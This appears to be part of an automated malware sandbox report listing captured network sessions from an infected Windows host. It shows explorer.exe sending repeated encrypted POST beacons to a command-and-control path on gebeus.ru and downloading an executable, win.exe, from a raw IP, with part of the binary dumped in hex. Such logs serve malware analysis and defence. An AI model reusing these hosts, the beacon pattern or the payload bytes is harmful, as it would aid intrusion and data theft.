                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.557788186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:05.893165112 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://prmalwoksspqb.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 192
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:05.893165112 CEST192OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 67 50 eb 89
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vugPGGSEG=Jr}l#*2l; X`^3=-!h&[.
                                                          Jul 19, 2024 13:44:06.942461967 CEST185INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:06 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10
                                                          Data Ascii: #\/_$hDm'&B


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.55778964.190.113.113801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:06.953922987 CEST159OUTGET /win.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 64.190.113.113
                                                          Jul 19, 2024 13:44:07.550863981 CEST1236INHTTP/1.1 200 OK
                                                          Date: Fri, 19 Jul 2024 11:44:07 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 18 Jul 2024 14:51:48 GMT
                                                          ETag: "f2000-61d86b7e62d3c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 991232
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 5b 24 32 21 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 da 08 00 00 4c 06 00 00 00 00 00 10 57 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 48 1f 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd[$2!"LW@`HDpX.text `.rdata@<@@.data00@.CRT`@@.relocXp@B
                                                          Jul 19, 2024 13:44:07.550901890 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 57
                                                          Data Ascii: VWSH0="u\D&=Ht$(fD=&~)=Np|tF="u\tE=&uNp|ffff.=h7t=9u(HL$ YHD$(h71H|$ 9==uHH
                                                          Jul 19, 2024 13:44:07.550920010 CEST1236INData Raw: f8 fc ff ff 8b 05 e2 1c 0f 00 8b 15 e0 1c 0f 00 44 8d 70 01 44 0f af f0 44 89 f0 83 f0 fe 44 85 f0 0f 94 44 24 47 83 fa 0a 0f 9c 44 24 48 41 bf de 67 30 5b e9 c3 fc ff ff 41 81 ff cc 9f 36 ea 0f 8e 4b 03 00 00 41 81 ff b5 80 10 ee 0f 8e ac 05 00
                                                          Data Ascii: DpDDDD$GD$HAg0[A6KAAI;qAPA??A^uH$D$XD$XAlWAn;AFuAy}DAFuuAe!wA8y
                                                          Jul 19, 2024 13:44:07.550935984 CEST1236INData Raw: ff 41 81 ff 72 8e a6 c9 0f 8e 83 0a 00 00 41 81 ff 73 8e a6 c9 0f 84 a2 15 00 00 41 81 ff aa ed 5a ce 0f 84 da 15 00 00 41 81 ff 6d 38 15 cf 0f 85 f3 f7 ff ff 41 bf c7 99 3d 0b e9 e8 f7 ff ff 41 81 ff bf a1 be 4b 0f 8e 88 0a 00 00 41 81 ff c0 a1
                                                          Data Ascii: ArAsAZAm8A=AKAK&A bL@ADwL$$AkZD$$A/^d\A0^dAFAS\|$FA$KA'@A-A
                                                          Jul 19, 2024 13:44:07.550952911 CEST1236INData Raw: 81 ff 9b 71 38 61 0f 84 67 16 00 00 41 81 ff 56 fc ef 6c 0f 85 3b f3 ff ff 48 8b 84 24 d0 02 00 00 0f b6 00 89 44 24 30 8b 44 24 30 8b 44 24 30 8b 44 24 30 41 bf 70 b2 b4 aa e9 15 f3 ff ff 41 81 ff 7e 7c 7f 9b 0f 84 91 16 00 00 41 81 ff 4e c6 d5
                                                          Data Ascii: q8agAVl;H$D$0D$0D$0D$0ApA~|ANAD$D$\D$\D$\Ai%AkA^AD$x$A3$$$A";A9As^
                                                          Jul 19, 2024 13:44:07.550967932 CEST1236INData Raw: 9f 0c 41 bc 4d 79 9f 0c 0f 85 64 ee ff ff 41 bc 40 3c a4 52 e9 59 ee ff ff 41 81 ff 2f 94 a0 8c 0f 84 aa 15 00 00 41 81 ff 3d d2 59 8d 0f 85 4d ee ff ff 8b 84 24 a4 00 00 00 89 44 24 54 8b 84 24 a8 00 00 00 89 84 24 98 00 00 00 8b 05 1e 0e 0f 00
                                                          Data Ascii: AMydA@<RYA/A=YM$D$T$$DhDEA=$D$(A bLA bL|A'EAtA'A0EAe_A=D$l$$ A]RA?$1R
                                                          Jul 19, 2024 13:44:07.550982952 CEST1236INData Raw: 5e 0f 84 da 13 00 00 41 81 ff f9 01 93 5f 0f 85 98 e9 ff ff 8b 44 24 6c 41 bf 6d 38 15 cf e9 89 e9 ff ff 8b 84 24 30 02 00 00 89 84 24 b8 00 00 00 8b 84 24 a0 00 00 00 89 84 24 b4 00 00 00 8b 84 24 5c 01 00 00 89 84 24 ac 00 00 00 41 bf 33 82 26
                                                          Data Ascii: ^A_D$lAm8$0$$$$\$A3&T$T$dD$NACLC-$@$4$@$8AAqI$$AqNT$ADt$BD0AqMAq
                                                          Jul 19, 2024 13:44:07.551001072 CEST1236INData Raw: 8b b9 da 29 e9 cf e4 ff ff 48 8b 84 24 b8 02 00 00 0f b6 00 01 c0 ff c0 89 84 24 cc 00 00 00 8b 84 24 18 02 00 00 89 84 24 bc 00 00 00 41 bf 78 b1 ab df e9 a0 e4 ff ff 8b 44 24 54 8b 44 24 54 8b 44 24 54 31 c0 2b 44 24 54 89 84 24 6c 02 00 00 41
                                                          Data Ascii: )H$$$$AxD$TD$TD$T1+D$T$lAVd"|D$41=T$D$D$AZWD$H$D$xT$xE1D$pD9AAA3D9DDD$TA=~$D$$$D$
                                                          Jul 19, 2024 13:44:07.551018000 CEST1236INData Raw: e9 ff df ff ff 8b 05 e9 ff 0e 00 89 84 24 48 01 00 00 8b 05 e0 ff 0e 00 89 84 24 48 02 00 00 8b 84 24 48 01 00 00 ff c8 89 84 24 4c 02 00 00 41 bf 65 67 d6 55 e9 ca df ff ff 8b 84 24 98 01 00 00 89 84 24 00 01 00 00 41 bf c8 49 a8 38 8b 84 24 9c
                                                          Data Ascii: $H$H$H$LAegU$$AI8$$H$IDt$4IPMM)M)IL$H$Dt$AD$@A?$D6$DAub$0$$At$$
                                                          Jul 19, 2024 13:44:07.551035881 CEST1236INData Raw: ff ff 8b 44 24 74 83 f8 02 0f 94 44 24 3f 41 bf b1 9e f5 2d e9 17 db ff ff 8b 44 24 5c 8b 44 24 5c 8b 44 24 5c 8b 44 24 68 8b 44 24 68 8b 44 24 68 8b 44 24 1c 8b 44 24 1c 8b 44 24 1c 8b 44 24 1c 8b 44 24 1c 41 bf c4 1a ed e2 e9 e0 da ff ff 8b 84
                                                          Data Ascii: D$tD$?A-D$\D$\D$\D$hD$hD$hD$D$D$D$D$A$$A^$$$$$$$AAt4uD$`D$@O$4AwEMH$HH$
                                                          Jul 19, 2024 13:44:07.555986881 CEST1236INData Raw: 41 83 fd 0a 41 0f 9c c6 41 30 c6 41 bf 9f b6 4a e8 41 be 9f b6 4a e8 75 06 41 be 97 9f 92 9f 41 83 fd 0a 45 0f 4d fe 44 85 e2 8b 84 24 f4 00 00 00 89 44 24 1c 8b 84 24 f8 00 00 00 89 84 24 88 00 00 00 45 0f 45 fe e9 10 d6 ff ff 8b 44 24 1c f7 d0
                                                          Data Ascii: AAA0AJAJuAAEMD$D$$$EED$D$>$,$A}YD$AJ$$A,OA=~$TH[]_^A\A]A^A_AWAVVWUSHf$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.557790186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:08.555561066 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://jvyahgkmsjudiynh.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 295
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:08.555613041 CEST295OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 41 14 a0 94
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA ,[k,vuAm<]^M\"bIe~D[mTjv -C;^,Nc.T(UquQ5J+Y6*UP6`(LZ&bBW
                                                          Jul 19, 2024 13:44:09.624656916 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:09 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.557791186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:09.637868881 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xdpeqpsppgevmdmy.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 281
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:09.637901068 CEST281OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 72 5f aa ea
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vur_luYxwh/=k8]@#E-GQE;S(aA.hVGYS_V7UyV\"o6et"#S
                                                          Jul 19, 2024 13:44:10.681716919 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.557792186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:44:10.690607071 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://fspagvqqxpvnoc.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 157
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:44:10.690634012 CEST157OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 56 3b c6 b5
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA -[k,vuV;z({!ue([yqJn<XH</CS7+:h#C
                                                          Jul 19, 2024 13:44:12.017155886 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:11 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                          Jul 19, 2024 13:44:12.017291069 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:44:11 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.557824186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:18.952672005 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bisribucgcplqa.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 292
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:18.952716112 CEST292OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 06 ef 80
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vugXiQkS|(bX4az'$6:%4P2Y{tEF,NSH*,>A"DX*<qaaq(i}yC4/u
                                                          Jul 19, 2024 13:45:20.002965927 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:19 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.557827186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:24.485888958 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://cuacgvevesxxi.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 305
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:24.485924959 CEST305OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 4b a8 82
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuCKYSnX:)p4xZ>.B-*WV8HhW/XzB,VS$%3OH9b-bK;S0i*LLJ
                                                          Jul 19, 2024 13:45:25.545648098 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:25 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.557831186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:30.240001917 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ytbwubxpmuvtgbr.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 339
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:30.240067959 CEST339OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 31 c9 fd
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuA1jpETm.~KOzjJP_K8HZIt7ZEu?uC#]ARAXLCwKQKr
                                                          Jul 19, 2024 13:45:31.281764984 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:31 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.557835186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:35.742310047 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://sflpljrbacyl.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 337
                                                          Host: gebeus.ru
                                                          Jul 19, 2024 13:45:35.742361069 CEST337OUTData Raw: 3b 6e 54 64 87 c8 6c 52 ab de c2 07 03 00 79 cb 0a 08 cb e5 68 05 91 64 79 7a 7d 92 32 cb b2 62 e8 5d c1 2b 73 6e 23 69 9d e9 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 47 a8 b8
                                                          Data Ascii: ;nTdlRyhdyz}2b]+sn#i?#1|J7 M@NA .[k,vuJGImABeLtpoD^s$D@gY0PG?~_<<m%$&[U"*ywao@YR((KAu
                                                          Jul 19, 2024 13:45:36.884357929 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Fri, 19 Jul 2024 11:45:36 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.557838186.145.236.93801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 19, 2024 13:45:40.952738047 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eiyfgialotb.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 362
                                                          Host: gebeus.ru
